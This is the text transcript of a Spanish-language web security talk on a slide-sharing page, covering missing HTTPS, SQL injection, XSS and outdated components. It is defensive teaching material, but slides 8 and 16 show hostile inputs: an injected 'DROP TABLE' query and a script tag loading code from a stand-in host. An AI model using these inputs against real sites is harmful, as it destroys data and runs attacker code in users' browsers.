Upgrade to Pro — share decks privately, control downloads, hide ads and more …

There Is No Silver Bullet (Español)

Sponsored · Your Podcast. Everywhere. Effortlessly. Share. Educate. Inspire. Entertain. You do you. We'll handle the rest.
Avatar for Harley Watson Harley Watson
November 29, 2014
Programming
0
170

There Is No Silver Bullet (Español)

Avatar for Harley Watson

Harley Watson

November 29, 2014
Tweet

More Decks by Harley Watson

See All by Harley Watson
paper tickets > smartcards, probably.
Avatar for Harley Watson unlobito
0
7.8k
one, two step
Avatar for Harley Watson unlobito
0
830
What's in your pocket? (BSides Manchester)
Avatar for Harley Watson unlobito
0
1k
sorry, we're cash only. (securi-tay)
Avatar for Harley Watson unlobito
1
1.3k
Sorry, we're cash only. (hacksoc)
Avatar for Harley Watson unlobito
0
110
There Is No Silver Bullet
Avatar for Harley Watson unlobito
0
970

Other Decks in Programming

See All in Programming
15年続くIoTサービスの SREエンジニアが挑む 分散トレーシング導入
Avatar for Melonps melonps
2
230
フロントエンド開発の勘所 -複数事業を経験して見えた判断軸の違い-
Avatar for Yoichiro Kubo heimusu
7
2.8k
16年目のピクシブ百科事典を支える最新の技術基盤 / The Modern Tech Stack Powering Pixiv Encyclopedia in its 16th Year
Avatar for ahu ahuglajbclajep
5
1k
CSC307 Lecture 07
Avatar for Javier Gonzalez-Sanchez javiergs
PRO
1
560
AIエージェント、”どう作るか”で差は出るか? / AI Agents: Does the "How" Make a Difference?
Avatar for r-kagaya rkaga
4
2k
CSC307 Lecture 10
Avatar for Javier Gonzalez-Sanchez javiergs
PRO
1
660
Automatic Grammar Agreementと Markdown Extended Attributes
について
Avatar for Kishikawa Katsumi kishikawakatsumi
0
200
Patterns of Patterns
Avatar for Denys Poltorak denyspoltorak
0
1.4k
Lambda のコードストレージ容量に気をつけましょう
Avatar for tatsuki-yamada tattwan718
0
140
24時間止められないシステムを守る-医療ITにおけるランサムウェア対策の実際
Avatar for kouki.miura koukimiura
1
120
Package Management Learnings from Homebrew
Avatar for Mike McQuaid mikemcquaid
0
230
humanlayerのブログから学ぶ、良いCLAUDE.mdの書き方
Avatar for Yuto tsukamoto1783
0
200

Featured

See All Featured
GitHub's CSS Performance
Avatar for Jon Rohan jonrohan
1032
470k
Scaling GitHub
Avatar for Zach Holman holman
464
140k
Prompt Engineering for Job Search
Avatar for Mfonobong Umondia mfonobong
0
160
個人開発の失敗を避けるイケてる考え方 / tips for indie hackers
Avatar for panda_program panda_program
122
21k
Building a Scalable Design System with Sketch
Avatar for Laura Van Doore lauravandoore
463
34k
The Invisible Side of Design
Avatar for Vitaly Friedman smashingmag
302
51k
Beyond borders and beyond the search box: How to win the global "messy middle" with AI-driven SEO
Avatar for David Carrasco davidcarrasco
1
57
Building Flexible Design Systems
Avatar for Yesenia Perez-Cruz yeseniaperezcruz
330
40k
16th Malabo Montpellier Forum Presentation
Avatar for AKADEMIYA2063 akademiya2063
PRO
0
52
Designing for Timeless Needs
Avatar for Cassini Nazir cassininazir
0
130
Digital Ethics as a Driver of Design Innovation
Avatar for Per Axbom axbom
PRO
1
190
Between Models and Reality
Avatar for mayunak mayunak
1
190

Transcript

  1. there is no silver bullet Henri Watson

  2. ¿Cuáles  son  los  problemas  que   comúnmente  afectan  a  las

     aplicaciones   web  en  la  República  Dominicana?  

  3. Una  falta  de  HTTPS  

  4. Usar  HTTPS  no  te  va  a  quitar  el   pica

     pollo  del  día.  

  5. La  propuesta  actual  para    HTTP/2.0  obliga  el  uso  de

     TLS.    

  6. Si  decides  usar  HTTPS,  también  usa   Strict-­‐Transport-­‐Security   y

     ssllabs.com/ssltest  

  7. Inyecciones  SQL  

  8. GET  /rastreador?orden=12345”;   DROP  TABLE  ordenes;-­‐-­‐   SELECT  *  FROM

     ordenes  WHERE  orden  =  “12345”;   DROP  TABLE  ordenes;-­‐-­‐”  AND  estado  =  “pendiente”   Solicitud  del   cliente  al  servidor.   Solicitud  del  servidor  web    a  la  base  de  datos.  
  9. None
  10. None
  11. None

  12. Problemas  en  el  manejo  de   autenacación  

  13. None
  14. None

  15. Cross-­‐Site  Scripang  (XSS)  

  16. GET  /hola?nombre=<script  src=“hhp://malva.do/ jajaxddd.js”></script>   ¡Hola,  <script  src=“hhp://malva.do/jajaxddd.js”></ script>!  

    Solicitud  del   cliente  al  servidor.   Respuesta  del   servidor  al  cliente.  

  17. Content-­‐Security-­‐Policy  

  18. Exposición  de  datos  sensiavos  

  19. None

  20. Ualizando  Componentes  con   Vulnerabilidades  Conocidas  

  21. Mailing  Lists   •  bugtraq   hhp://www.securityfocus.com/archive/1   •  debian-­‐security-­‐announce

      hhps://lists.debian.org/debian-­‐security-­‐announce/   •  fulldisclosure   hhp://nmap.org/mailman/lisanfo/fulldisclosure  

  22. Mailing  Lists   •  [email protected]   hhps://hhpd.apache.org/lists.html#hhp-­‐announce   •  nginx-­‐announce

      hhp://mailman.nginx.org/mailman/lisanfo/nginx-­‐ announce   •  php-­‐announce   hhp://php.net/mailing-­‐lists.php  
  23. None

  24. Servicio  a  Cliente  

  25. None

  26. ¿Por  qué  una  no  existe  una   «  bala  de

     plata  »?  

  27. La  seguridad  informáaca  es  una   inversión  constante.  

  28. Heartbleed  

  29. Al  poner  los  datos  de  tus   usuarios  en  riesgo,

     también  pones   tu  reputación  en  riesgo.  

  30. ¡Gracias!   @henriwatson   [email protected]     hhps://henriwatson.com/talks/silverbullet